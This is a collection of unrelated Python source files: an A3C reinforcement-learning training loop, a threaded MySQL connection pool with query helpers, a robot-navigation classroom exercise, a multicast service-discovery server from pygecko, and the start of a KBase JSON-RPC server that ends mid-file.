l_c = tf.layers.dense(self.s, 100, tf.nn.relu6, kernel_initializer=w_init, name='lc')
v = tf.layers.dense(l_c, 1, kernel_initializer=w_init, name='v') # state value
a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
return mu, sigma, v, a_params, c_params
def update_global(self, feed_dict): # run by a local
SESS.run([self.update_a_op, self.update_c_op], feed_dict) # local grads applies to global net
def pull_global(self): # run by a local
SESS.run([self.pull_a_params_op, self.pull_c_params_op])
def choose_action(self, s):
# run by a local: choose action from normal distributions
s = s[np.newaxis, :]
return SESS.run(self.A, {self.s: s})
class Worker:
def __init__(self, name, globalAC):
self.env = gym.make(GAME).unwrapped
self.name = name
self.AC = ACNet(name, globalAC=globalAC)
def work(self):
global GLOBAL_RUNNING_R, GLOBAL_EP
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while not COORD.should_stop() and GLOBAL_EP < MAX_GLOBAL_EP:
s = self.env.reset()
ep_r = 0
for ep_t in range(MAX_EP_STEP):
a = self.AC.choose_action(s)
s_, r, done, info = self.env.step(a)
done = ep_t == MAX_EP_STEP - 1
r /= 10 # normalize reward
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append(r)
if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = SESS.run(self.AC.v, feed_dict={self.AC.s: s_[np.newaxis, :]})[0, 0]
buffer_v_target = []
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_ # compute target_v via v(s) = r + GAMMA * v(s')
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.vstack(buffer_a), np.vstack(
buffer_v_target)
feed_dict = {
self.AC.s: buffer_s,
self.AC.a_his: buffer_a,
self.AC.v_target: buffer_v_target
}
self.AC.update_global(feed_dict) # push local gradients to global net
buffer_s, buffer_a, buffer_r = [], [], []
self.AC.pull_global() # pull the newest global params to local
s = s_
total_step += 1
if done:
if len(GLOBAL_RUNNING_R) == 0: # record running episode reward
GLOBAL_RUNNING_R.append(ep_r)
else:
GLOBAL_RUNNING_R.append(0.99 * GLOBAL_RUNNING_R[-1] + 0.01 * ep_r)
print(self.name, "Ep:", GLOBAL_EP, "| Ep_r: %i" % GLOBAL_RUNNING_R[-1])
GLOBAL_EP += 1
break
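# Worked example of the target computation above (a sketch): with GAMMA = 0.9, a
# bootstrap value v_s_ = 1.0 and buffer_r = [0.1, 0.2, 0.3], iterating over the
# rewards in reverse gives
#   v3 = 0.3 + 0.9 * 1.0  = 1.2
#   v2 = 0.2 + 0.9 * 1.2  = 1.28
#   v1 = 0.1 + 0.9 * 1.28 = 1.252
# so buffer_v_target = [1.252, 1.28, 1.2] after the final reverse().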
if __name__ == '__main__':
SESS = tf.Session()
with tf.device("/cpu:0"):
# define two optimizers for actors and critics in local net
OPT_A = tf.train.RMSPropOptimizer(LR_A, name='RMSPropA')
OPT_C = tf.train.RMSPropOptimizer(LR_C, name='RMSPropC')
GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE) # we only need its parameters
workers = []
# Create worker
for i in range(N_WORKERS):
i_name = "W_%i" % i # worker name
workers.append(Worker(i_name, GLOBAL_AC))
# tf.train.Coordinator() creates a coordinator object that manages the
# multiple worker threads running in this Session.
COORD = tf.train.Coordinator()
SESS.run(tf.global_variables_initializer())
if OUTPUT_GRAPH:
if os.path.exists(LOG_DIR):
shutil.rmtree(LOG_DIR)
tf.summary.FileWriter(LOG_DIR, SESS.graph)
start_time = time.time()
worker_threads = []
for worker in workers:
t = threading.Thread(target=worker.work) # create a thread for this worker (bind the method directly instead of a lambda that would late-bind `worker`)
t.start() # start the thread
worker_threads.append(t)
COORD.join(worker_threads) # wait in the main thread for all worker threads to finish
env.close()
print("%d线程耗时:" % N_WORKERS, str(time.time() - start_time), 's')
plt.plot(np.arange(len(GLOBAL_RUNNING_R)), GLOBAL_RUNNING_R)
plt.xlabel('step')
plt.ylabel('Total moving reward')
plt.show()
|
suit.py
|
#!/usr/bin/env python
# coding=utf-8
import time
import functools
import threading
try:
from webcrawl.queue.lib import queue
except:
import Queue as queue
threading.queue = queue
import weakref
import traceback
import sys
import handler
from . import CFG
from .. import singleton
from ..util import transfer
from error import ConnectionNotInPoolError, \
ConnectionPoolOverLoadError, \
ClassAttrNameConflictError, \
ConnectionNotFoundError, \
ConnectionNameConflictError
MINLIMIT = 10
MAXLIMIT = 40
ORDER = {1:'asc', -1:'desc'}
customattrs = lambda cls:[attr for attr in dir(cls) if not attr.startswith('_')]
class DBConnect(handler.DBHandler):
def __init__(self, settings, autocommit=False, resutype='TUPLE'):
super(DBConnect, self).__init__('', handler.dblib.connect(**settings), resutype=resutype, autocommit=autocommit)
class DBPool(object):
def __init__(self, markname, minlimit=MINLIMIT, maxlimit=MAXLIMIT, **settings):
self.markname = markname
self.minlimit = minlimit
self.maxlimit = maxlimit
self.settings = settings
self._lock = threading.Lock()
self.queue = threading.queue.Queue(self.maxlimit)
self._openconnects = []
self._liveconnects = 0
self._peakconnects = 0
def __repr__(self):
return "<%s::%s>" % (self.__class__.__name__, self.markname)
@property
def alive(self):
return self._liveconnects
@property
def peak(self):
return self._peakconnects
def clearIdle(self):
while self.queue.qsize() > self.minlimit:
connect = self.queue.get()
connect.close()
del connect
with self._lock:
self._liveconnects -= 1
def connect(self):
if self.queue.empty():
with self._lock:
if self._liveconnects >= self.maxlimit:
raise ConnectionPoolOverLoadError("Connections of %s reach limit!" % self.__repr__())
else:
self.queue.put(handler.dblib.connect(**self.settings))
self._liveconnects += 1
connect = self.queue.get()
else:
try:
connect = self.queue.get()
connect.ping()
except:
del connect
connect = handler.dblib.connect(**self.settings)
self._appendOpenconnect(connect)
return connect
def release(self, conn):
self._removeOpenconnect(conn)
with self._lock:
try:
conn.rollback()
except handler.dblib.OperationalError:
print "connection seems closed, drop it."
else:
self.queue.put(conn)
finally:
pass
self.clearIdle()
def _appendOpenconnect(self, conn):
with self._lock:
self._openconnects.append(conn)
if self._peakconnects < len(self._openconnects):
self._peakconnects = len(self._openconnects)
def _removeOpenconnect(self, conn):
with self._lock:
try:
self._openconnects.remove(conn)
except Exception:
raise ConnectionNotInPoolError("Connection seems not belong to %s" % self.__repr__())
@singleton
class DBPoolCollector(object):
def __init__(self, handler=None, delegate=False):
"""
Global DBPoolCollector with a specific connection handler.
Call DBPoolCollector.connect to pass the MySQL connection to this handler,
and use DBPoolCollector.handler to access the current database connection
wrapper class.
:param handler: connection handler class
:param delegate: if True, delegate attribute access to the current handler
"""
self._handler = handler
self._collection = {}
# self._instance_lock = threading.Lock()
self._current = None
# self._lock = threading.Lock()
# the queue stores available handler instance
# with self._instance_lock:
# self._instance = self
self.setDelegate(delegate)
def __getattr__(self, attr):
if not self._delegate or (attr.startswith('_') or not hasattr(self._current,"handler")):
return self.__getattribute__(attr)
else:
return getattr(self._current.handler, attr)
def setDelegate(self, delegate):
if delegate:
if set(customattrs(self._handler)).intersection(set(customattrs(self))):
raise ClassAttrNameConflictError("If open delegate, ConnectionHandler's attr name should not appear in DBPoolCollector")
self._delegate = True
else:
self._delegate = False
def addDB(self, markname, minlimit=MINLIMIT, maxlimit=MAXLIMIT, **settings):
"""
:param markname: string database name
:param settings: connection kwargs
:return:
"""
if self._current is None:
self._current = threading.local()
self._current.connect = None
self._current.markname = None
self._current.handler = None
override = settings.pop("override", False)
if not override and self._collection.has_key(markname):
msg = "Alreay exist connection '%s',override or rename it." % markname
print msg
# raise ConnectionNameConflictError(msg)
else:
self._collection[markname] = DBPool(markname, minlimit, maxlimit, **settings)
def deleteDB(self, markname):
"""
:param markname: string database name
"""
if self._current.markname == markname:
self.release()
if markname in self._collection:
del self._collection[markname]
def connect(self, markname, resutype='TUPLE', autocommit=False):
"""
Mapping current connection handler's method to DBPoolCollector
:return:
"""
if not hasattr(self._current, "connect") or self._current.connect is None:
self._current.connect = self._collection[markname].connect()
self._current.markname = markname
self._current.handler = handler.DBHandler(markname, self._current.connect, resutype=resutype, autocommit=autocommit, db=self._collection[markname].settings['db'])
self._current.connect._cursor = weakref.proxy(self._current.handler._curs)
else:
try:
self._current.connect.ping()
if handler.dbtype == 1:
self._current.handler._curs._connection = weakref.proxy(self._current.connect)
else:
self._current.handler._curs.connection = weakref.proxy(self._current.connect)
except:
self._current.connect = handler.dblib.connect(**self._collection[markname].settings)
self._current.handler = self._handler(markname, self._current.connect, resutype=resutype, autocommit=autocommit, db=self._collection[markname].settings['db'])
self._current.connect._cursor = weakref.proxy(self._current.handler._curs)
# raise AlreadyConnectedError("Database:'%s' is already connected !" % markname)
def release(self):
"""
:return:
"""
# print "start...", self._current.markname, self._current.connect
if hasattr(self._current, 'connect') and self._current.connect is not None:
self._collection[self._current.markname].release(self._current.connect)
del self._current.handler, self._current.connect
# print "end..."
@property
def handler(self):
if hasattr(self._current, 'handler') and self._current.handler is not None:
return weakref.proxy(self._current.handler)
else:
return None
# @staticmethod
# def instance():
# if not hasattr(DBPoolCollector, "_instance"):
# with DBPoolCollector._instance_lock:
# if not hasattr(DBPoolCollector, "_instance"):
# DBPoolCollector._instance = DBPoolCollector()
# return DBPoolCollector._instance
dbpc = DBPoolCollector(handler.DBHandler, delegate=True)
# dbpc = None
def withMysql(mark, resutype='TUPLE', autocommit=False):
"""
:param mark: database mark name, or a callable returning it
:return: the decorator with specific db connection
"""
def wrapped(fun):
@functools.wraps(fun)
def wrapper(*args, **kwargs):
if hasattr(mark, '__call__'):
markname = mark()
else:
markname = mark
if not dbpc._collection.has_key(markname):
raise ConnectionNotFoundError("Not found connection for '%s', use dbpc.addDB add the connection" % markname)
if dbpc.handler is None:
dbpc.connect(markname, resutype=resutype, autocommit=autocommit)
try:
res = fun(*args, **kwargs)
except:
raise
finally:
dbpc.release()
return res
return wrapper
return wrapped
@withMysql(CFG.R, resutype='DICT')
def withMysqlCount(table, spec):
keys = []
args = []
where = transfer(spec, grand=None, parent='', index=keys, condition=args)
if where:
where = 'where %s' % where
return dbpc.handler.queryOne('select count(*) as total from `%s` %s' % (table, where), [args[index][one] for index, one in enumerate(keys)])['total']
@withMysql(CFG.R, resutype='DICT')
def withMysqlQuery(table, spec, projection={}, sort=[], skip=0, limit=10, qt='all'):
"""
:param table: table name
:param spec: query condition dict
:return: all matching rows if qt == 'all', otherwise a single row
"""
keys = []
args = []
where = transfer(spec, grand=None, parent='', index=keys, condition=args)
if projection:
projection['_id'] = projection.get('_id', 1)
projection = ['id' if k == '_id' else k for k, v in projection.items() if v == 1]
projection = ','.join(['`%s` as _id' % c if c == 'id' else '`%s`' % c for c in projection])
else:
projection = '*, `id` as `_id`'
if sort:
sort = 'order by ' + ','.join(['%s %s' % (one[0], ORDER.get(one[-1], 'asc')) for one in sort])
else:
sort = ''
if where:
where = 'where %s' % where
if qt.lower() == 'all':
return dbpc.handler.queryAll('select %s from `%s` %s %s limit %d, %d' % (projection, table, where, sort, skip, limit), [args[index][one] for index, one in enumerate(keys)])
else:
return dbpc.handler.queryOne('select %s from `%s` %s %s limit %d, %d' % (projection, table, where, sort, 0, 1), [args[index][one] for index, one in enumerate(keys)])
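# A sketch of the SQL assembled above for an illustrative call such as
# withMysqlQuery('hotel_info_original', spec, projection={'name': 1},
#                sort=[('id', -1)], skip=0, limit=10, qt='all'):
# the projection expands to something like "`name`,`id` as _id", the sort clause
# to "order by id desc", and the statement passed to queryAll is roughly
#   select `name`,`id` as _id from `hotel_info_original` where ... order by id desc limit 0, 10
# with the WHERE clause and its parameters produced by transfer(spec, ...).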
@withMysql(CFG.W, autocommit=True)
def withMysqlInsert(table, doc, keycol, update=True):
items = doc.items()
items.sort(lambda x,y:cmp(x[0], y[0]))
if update:
_insertsql = 'insert into `%s` (%s) ' % (table, ','.join('`'+one[0]+'`' for one in items)) + 'values (%s)' % ','.join('%s' for one in items) + ' on duplicate key update %s' % ','.join('`'+one+'`=values(`'+one+'`)' for one in keycol if not one == 'create_time')
else:
_insertsql = 'insert ignore into `%s` (%s) ' % (table, ','.join('`'+one[0]+'`' for one in items)) + 'values (%s)' % ','.join('%s' for one in items)
one = tuple([i[1] for i in items])
return dbpc.handler.insert(_insertsql, one)
@withMysql(CFG.W, autocommit=True)
def withMysqlDelete(table, spec):
if spec == {}:
raise Exception("Wrong delete spec.")
keys = []
args = []
where = transfer(spec, grand=None, parent='', index=keys, condition=args)
dbpc.handler.delete('delete from `%s` where %s' % (table, where), [args[index][one] for index, one in enumerate(keys)])
@withMysql(CFG.W, autocommit=True)
def withMysqlUpdate(table, spec, doc):
if spec == {}:
raise Exception("Wrong update spec.")
for k in doc:
if not k in ('$set', '$inc'):
raise Exception("Wrong update doc, only assist $set and $inc.")
sets = doc.get('$set', {}).items()
if sets:
resets = [','.join('`'+one[0]+'`=%s' for one in sets)]
else:
resets = []
incs = doc.get('$inc', {}).items()
incs = ','.join('`%s`=`%s`+%d' % (one[0], one[0], one[1]) for one in incs)
if incs:
resets.append(incs)
keys = []
args = []
where = transfer(spec, grand=None, parent='', index=keys, condition=args)
dbpc.handler.update('update `%s` set %s where %s' % (table, ','.join(resets), where), [one[1] for one in sets] + [args[index][one] for index, one in enumerate(keys)])
if __name__ == "__main__":
dbpc.addDB("local", 1, host="127.0.0.1",
port=3306,
user="root",
passwd="",
db="kuaijie",
charset="utf8",
use_unicode=False,
override=False)
@withMysql('local')
def test1():
for one in dbpc.handler.showColumns('hotel_info_collection'):
# print ''
pass
@withMysql('local')
def test2():
for one in dbpc.handler.showColumns('hotel_info_original'):
# print ''
pass
@withMysql('local')
def test3():
for one in dbpc.handler.showColumns('hotel_info_mapping'):
pass
# print ''
from threading import Thread
a = Thread(target=test1)
b = Thread(target=test2)
c = Thread(target=test3)
a.start()
# a.join()
b.start()
# b.join()
c.start()
# c.join()
a.join()
b.join()
c.join()
|
Problem3_4.py
|
# -*- coding: utf-8 -*-
from RobotTracker import *
import time
from threading import Thread, Event
def Problem3():
repeatCounter = 0
time.sleep(1)
counter = 0
oneFound = False
twoFound = False
threeFound = False
fourFound = False
############################################################################################
# drive to point
r.displayGoals = True
t1 = time.time()
cv2.putText(r.textArea, "Amazon is adding new drone routes to Nashville! They need", (0, 80), 2, .5, (100,200,100), 1)
cv2.putText(r.textArea, "coordinates for some of the locations, help them out by", (0, 95), 2, .5, (100,200,100), 1)
cv2.putText(r.textArea, "driving the robot to each new location in one sequence.", (0, 110), 2, .5, (100,200,100), 1)
cv2.putText(r.textArea, "You should probably start at the Amazon warehouse, right?", (0, 160), 2, .5, (100,200,100), 1)
cv2.putText(r.textArea, "Remember, you want to find the shortest path possible.", (0, 190), 2, .5, (100,200,100), 1)
cv2.putText(r.textArea, "The coordinates of the points are now shown.", (0, 220), 2, .5, (100,200,100), 1)
cv2.putText(r.textArea, "Nice Work!", (0, 300), 4, 1.2, (100,200,100), 1)
## print("first, enter the coordinates for the Amazon Warehouse, location 1")
## print("ex, if the coordinates are (5,5), enter 5,5 without parentheses")
## userIn = input("> ")
## while(userIn != "2,-2"):
## if(repeatCounter == 0):
## print("double check your entry...")
## repeatCounter += 1
## elif(repeatCounter == 1):
## print("x is positive and y is negative...")
## repeatCounter += 1
## elif(repeatCounter == 2):
## print("maybe you need some extra assistance...")
## userIn = input("> ")
## print("Great!")
##
## print("enter the coordinates for the office1, location 2")
## userIn = input("> ")
## while(userIn != "2,1"):
## if(repeatCounter == 0):
## print("double check your entry...")
## repeatCounter += 1
## elif(repeatCounter == 1):
## print("x is positive and y is positive...")
## repeatCounter += 1
## elif(repeatCounter == 2):
## print("maybe you need some extra assistance...")
## userIn = input("> ")
##
## print("enter the coordinates for the office2, location 3")
## userIn = input("> ")
## while(userIn != "-2,1"):
## if(repeatCounter == 0):
## print("double check your entry...")
## repeatCounter += 1
## elif(repeatCounter == 1):
## print("x is negative and y is positive...")
## repeatCounter += 1
## elif(repeatCounter == 2):
## print("maybe you need some extra assistance...")
## userIn = input("> ")
##
## print("enter the coordinates for the office3, location 4")
## userIn = input("> ")
## while(userIn != "1,4"):
## if(repeatCounter == 0):
## print("double check your entry...")
## repeatCounter += 1
## elif(repeatCounter == 1):
## print("x is positive and y is positive...")
## repeatCounter += 1
## elif(repeatCounter == 2):
## print("maybe you need some extra assistance...")
## userIn = input("> ")
r.displayGoalLoc = True
## while(counter != 4):
## time.sleep(2)
## if(r.location == str(r.points[0]) and oneFound == False):
## counter += 1
## oneFound = True
## if(r.location == str(r.points[1]) and twoFound == False):
## counter += 1
## twoFound = True
## if(r.location == str(r.points[2]) and threeFound == False):
## counter += 1
## threeFound = True
## if(r.location == str(r.points[3]) and fourFound == False):
## counter += 1
## fourFound = True
##
#cv2.putText(r.textArea, "Nice Work!", (0, 300), 4, 1.2, (100,200,100), 1)
repeatCounter = 0
time.sleep(20)
r.displayGoals = False
r.displayGoalLoc = False
r.textArea = np.zeros((r.frame.shape[0],550,3),dtype=np.uint8)
r.finished = True
if (__name__ == "__main__"):
r = Robot()
r.displayGoals = False
problemThread = Thread(target=Problem3)
problemThread.daemon = True
problemThread.e = Event()
problemThread.start()
r.Run()
problemThread.e.set()
problemThread.join()
|
core.py
|
# -*- coding: utf-8 -*-
##############################################
# The MIT License (MIT)
# Copyright (c) 2014 Kevin Walchko
# see LICENSE for full details
##############################################
#
#
import threading
import time
from pygecko.network.ip import get_ip
# from pygecko.network.transport import Ascii
from pygecko.network.mcsocket import MultiCastSocket
from pygecko.network.mcsocket import MultiCastError
# import psutil
import multiprocessing as mp
from colorama import Fore, Style
class CoreServer:
mcast_addr = '224.0.0.1'
mcast_port = 11311
timeout = 2
ttl = 2
services = {} # services
perf = {}
exit = False
pubs = {}
subs = {}
print = True
bind = {}
conn = {}
def __init__(self, key, handler, ttl=2, addr=None, enable_print=True):
if addr is not None:
if len(addr) == 2:
self.mcast_addr = addr[0]
self.mcast_port = addr[1]
self.group = (self.mcast_addr, self.mcast_port)
try:
self.sock = MultiCastSocket(group=self.group, ttl=ttl, timeout=1)
except MultiCastError as e:
print("*** {} ***".format(e))
raise e
self.key = key
self.host_ip = get_ip()
self.pid = mp.current_process().pid
# setup server data
self.handler = handler() # serialization method
# setup thread
self.listener = threading.Thread(target=self.printLoop)
def printLoop(self):
while not self.exit:
if True:
self.print()
time.sleep(3)
def start(self):
"""Start the listener thread"""
self.listener.setDaemon(True)
self.listener.start()
def stop(self):
"""Stop the listener thread"""
self.exit = True
def printProcess(self, pids, bind=False):
# grab a snapshot of the values
procs = tuple(pids.values())
for ps, topic in procs:
# print(pid)
# print(ps)
# print(topic)
try:
if ps.is_running():
# faster or better?
# p.cpu_percent(interval=None)
# p.memory_percent(memtype="rss")
pd = ps.as_dict(attrs=['connections', 'cpu_percent', 'memory_percent'])
# net[psname] = pd['connections']
# print(psname, pd['connections'])
# cpu = ps.cpu_percent()
# cpu = cpu if cpu else -1
# mem = ps.memory_percent()
# mem = mem if mem else -1
label = '[{:>5}] {}'.format(ps.pid, topic)
print(' {:.<30} cpu:{:5.1f}% mem:{:5.1f}%'.format(label, pd['cpu_percent'], pd['memory_percent']))
# print('| {:.<30} cpu: {:5}% mem: {:6.2f}%'.format(label, cpu, mem))
else:
# print('*** remove {} ***'.format(ps.pid))
pids.pop(ps.pid)
if bind: self.services.pop(topic)
except Exception as e:
print("*** printProcess: {} ***".format(e))
pids.pop(ps.pid)
if bind: self.services.pop(topic)
# except:
# pids.pop(pid)
# pass
def print(self):
print(" ")
print("="*40)
print(" Geckocore [{}]".format(self.pid))
print("-------------")
print(" Key: {}".format(self.key))
print(" Host IP: {}".format(self.host_ip))
print(" Listening on: {}:{}".format(self.mcast_addr, self.mcast_port))
print("-------------")
print('Known Services [{}]'.format(len(self.services)))
for k, v in self.services.items():
print(" * {:.<30} {}".format(k+':', v))
print("\nBinders [{}]".format(len(self.pubs)))
self.printProcess(self.pubs, True)
print("\nConnections [{}]".format(len(self.subs)))
self.printProcess(self.subs)
print(" ")
def handle_conn(self, data):
# print("handle_sub")
# print(data)
# print(self.services.keys())
# print("handle_conn:", data)
# print("handle_conn 0:", data[0])
# print("handle_conn 1:", data[1])
# print("handle_conn 2:", data[2])
ret = None
topic = data[1]
pid = int(data[2])
if topic in self.services.keys():
endpt = self.services[topic]
ret = (self.key, topic, endpt, "ok")
# self.subs[pid] = (psutil.Process(pid), topic,)
print(Fore.CYAN + ">> CONN[{}] {}:{}".format(pid, topic, endpt) + Style.RESET_ALL)
# else:
# print("*** handle_sub FAILURE ***")
# print(">> handle_sub:", ret)
return ret
def handle_bind(self, data):
# print("handle_bind:", data)
# print("handle_bind 0:", data[0])
# print("handle_bind 1:", data[1])
# print("handle_bind 2:", data[2])
# print("handle_bind 3:", data[3])
topic = data[1]
pid = int(data[2])
endpt = data[3]
self.services[topic] = endpt
# self.pubs[pid] = (psutil.Process(pid), topic,)
print(Fore.MAGENTA + ">> BIND[{}] {}:{}".format(pid, topic, endpt) + Style.RESET_ALL)
return (self.key, topic, endpt, "ok",)
def run(self): # FIXME: remove
self.listen()
def listen(self):
while not self.exit:
self.loopOnce()
def loopOnce(self):
try:
data, address = self.sock.recv()
# print("run:", address, data)
if data:
data = self.handler.loads(data)
if self.key == data[0]:
msg = None
if self.key == data[0]:
if len(data) == 3:
msg = self.handle_conn(data)
elif len(data) == 4:
if data[3] != "ok":
msg = self.handle_bind(data)
# else:
# print("*** wtf ***")
if msg:
msg = self.handler.dumps(msg)
# self.sock.sendto(msg, address)
self.sock.cast(msg)
# time.sleep(0.01)
# if msg:
# msg = self.handler.dumps(msg)
# self.sock.sendto(msg, address)
# print(">> beacon sent: {}".format(msg))
except KeyboardInterrupt:
print("ctrl-z")
self.exit = True
return
# except Exception as e:
# print("*** run: {} ***".format(e))
# continue
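# A sketch of the multicast message shapes dispatched by loopOnce() above, based
# on the tuple lengths it checks; the field values are illustrative:
#   connect request : (key, topic, pid)            -> handle_conn()
#   bind request    : (key, topic, pid, endpoint)  -> handle_bind()
#   reply to either : (key, topic, endpoint, "ok")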
######################################################
# class BeaconFinder(BeaconBase):
# """
# Find Services using the magic of multicast
#
# pid = 123456
# proc_name = "my-cool-process"
# key = hostname
# finder = BeaconFinder(key)
# msg = finder.search(msg)
# """
# def __init__(self, key, ttl=1, handler=Pickle):
# BeaconBase.__init__(self, key=key, ttl=ttl)
# self.handler = handler()
#
# def send(self, msg):
# """
# Search for services using multicast sends out a request for services
# of the specified name and then waits and gathers responses. This sends
# one mdns ping. As soon as a responce is received, the function returns.
# """
# # serviceName = 'GeckoCore'
# self.sock.settimeout(self.timeout)
# # msg = self.handler.dumps((self.key, serviceName, str(pid), processname,))
# # msg['key'] = self.key
# msg = self.handler.dumps(msg)
# self.sock.sendto(msg, self.group)
# servicesFound = None
# while True:
# try:
# # data = returned message info
# # server = ip:port, which is x.x.x.x:9990
# data, server = self.sock.recvfrom(1024)
# data = self.handler.loads(data)
# # print('>> Search:', data, server)
# servicesFound = data
# break
# # if len(data) == 2:
# # servicesFound = (zmqTCP(server[0], data[0]), zmqTCP(server[0], data[1]),)
# # break
# except socket.timeout:
# print("*** timeout ***")
# break
# # print(">> search done")
# return servicesFound
#
# class BeaconServer(BeaconBase):
# """A simple multicast listener which responds to
# requests for services it has
#
# # message to be transmitted via multicast
# msg = {'something': 123, 'other': 'abc'}
#
# # create a server
# provider = BeaconServer(
# 'hostname',
# callback_function [optional], # ??
# handler # ??
# )
#
# provider.start()
# try:
# while True:
# time.sleep(500)
# except KeyboardInterrupt:
# provider.stop()
#
# """
# def __init__(self, key, callback=None, handler=Ascii, ttl=1, addr=None):
# BeaconBase.__init__(self, key=key, ttl=ttl)
#
# if addr is not None:
# if len(addr) == 2:
# self.mcast_addr = addr[0]
# self.mcast_port = addr[1]
#
# # setup service socket
# # allow multiple connections
# self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# try:
# self.sock.bind(('0.0.0.0', self.mcast_port))
# # self.sock.bind((self.mcast_addr, self.mcast_port))
# except OSError as e:
# print("*** {} ***".format(e))
# raise
#
# mreq = struct.pack("=4sl", socket.inet_aton(self.mcast_addr), socket.INADDR_ANY)
# self.sock.setsockopt(socket.SOL_IP, socket.IP_ADD_MEMBERSHIP, mreq)
#
# # setup server data
# # self.services = {} # services
# self.callback = callback
# self.handler = handler() # serialization method
#
# # setup thread
# # self.exit = False
# # self.listener = threading.Thread(target=self.listenerThread)
#
# # def start(self):
# # """Start the listener thread"""
# # self.listener.setDaemon(True)
# # self.listener.start()
# #
# # def stop(self):
# # """Stop the listener thread"""
# # self.exit = True
# #
# # def listen(self):
# # """TBD"""
# # pass
#
# def run(self):
# # self.sock.setblocking(0)
#
# ip = GetIP().get()
# print("<<< beacon ip: {} >>>".format(ip))
#
# # while self.exit is False:
# while True:
# # print('-'*40)
# # for k,v in self.services.items():
# # print("{}: {}".format(k,v))
# #
# # if self.exit is True:
# # break
# # else:
# # time.sleep(0.2)
# try:
# # time.sleep(0.2)
# data, address = self.sock.recvfrom(1024)
# except KeyboardInterrupt:
# print("ctrl-z")
# return
# except Exception:
# continue
#
# data = self.handler.loads(data)
# # print(">> Address: {}".format(address))
# # print(">> Data: {}".format(data))
#
# if self.key == data[0]:
# if self.callback:
# msg = self.callback(data, address)
# # print("MM:",msg)
# if msg:
# msg = self.handler.dumps(msg)
# self.sock.sendto(msg, address)
# # print(">> beacon sent: {}".format(msg))
# # else:
# # msg = self.handler.dumps(('hello',))
# # self.sock.sendto(msg, address)
|
jcatlett_ContigFilterServer.py
|
#!/usr/bin/env python
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, ServerError, InvalidRequestError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import biokbase.nexus
import requests as _requests
import urlparse as _urlparse
import random as _random
import os
import requests.packages.urllib3
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'jcatlett_ContigFilter'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from jcatlett_ContigFilter.jcatlett_ContigFilterImpl import jcatlett_ContigFilter
impl_jcatlett_ContigFilter = jcatlett_ContigFilter(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
sync_methods = {}
async_run_methods = {}
async_check_methods = {}
async_run_methods['jcatlett_ContigFilter.filter_contigs_async'] = ['jcatlett_ContigFilter', 'filter_contigs']
async_check_methods['jcatlett_ContigFilter.filter_contigs_check'] = ['jcatlett_ContigFilter', 'filter_contigs']
sync_methods['jcatlett_ContigFilter.filter_contigs'] = True
async_run_methods['jcatlett_ContigFilter.filter_contigs_max_async'] = ['jcatlett_ContigFilter', 'filter_contigs_max']
async_check_methods['jcatlett_ContigFilter.filter_contigs_max_check'] = ['jcatlett_ContigFilter', 'filter_contigs_max']
sync_methods['jcatlett_ContigFilter.filter_contigs_max'] = True
class AsyncJobServiceClient(object):
def __init__(self, timeout=30 * 60, token=None,
ignore_authrc=True, trust_all_ssl_certificates=False):
url = environ.get('KB_JOB_SERVICE_URL', None)
if url is None and config is not None:
url = config.get('job-service-url')
if url is None:
raise ValueError('Neither \'job-service-url\' parameter is defined in '+
'configuration nor \'KB_JOB_SERVICE_URL\' variable is defined in system')
scheme, _, _, _, _, _ = _urlparse.urlparse(url)
if scheme not in ['http', 'https']:
raise ValueError(url + " isn't a valid http url")
self.url = url
self.timeout = int(timeout)
self._headers = dict()
self.trust_all_ssl_certificates = trust_all_ssl_certificates
if token is None:
raise ValueError('Authentication is required for async methods')
self._headers['AUTHORIZATION'] = token
if self.timeout < 1:
raise ValueError('Timeout value must be at least 1 second')
def _call(self, method, params, json_rpc_call_context = None):
arg_hash = {'method': method,
'params': params,
'version': '1.1',
'id': str(_random.random())[2:]
}
if json_rpc_call_context:
arg_hash['context'] = json_rpc_call_context
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
ret = _requests.post(self.url, data=body, headers=self._headers,
timeout=self.timeout,
verify=not self.trust_all_ssl_certificates)
if ret.status_code == _requests.codes.server_error:
if 'content-type' in ret.headers and ret.headers['content-type'] == 'application/json':
err = json.loads(ret.text)
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, ret.text)
else:
raise ServerError('Unknown', 0, ret.text)
if ret.status_code != _requests.codes.OK:
ret.raise_for_status()
resp = json.loads(ret.text)
if 'result' not in resp:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
return resp['result']
def run_job(self, run_job_params, json_rpc_call_context = None):
return self._call('KBaseJobService.run_job', [run_job_params], json_rpc_call_context)[0]
def check_job(self, job_id, json_rpc_call_context = None):
return self._call('KBaseJobService.check_job', [job_id], json_rpc_call_context)[0]
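# A sketch of the JSON-RPC envelope built by AsyncJobServiceClient._call() above;
# the method name and params are illustrative, the field names follow the code:
#   {
#       "method": "KBaseJobService.run_job",
#       "params": [run_job_params],
#       "version": "1.1",
#       "id": "8444218515250481"
#   }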
class JSONRPCServiceCustom(JSONRPCService):
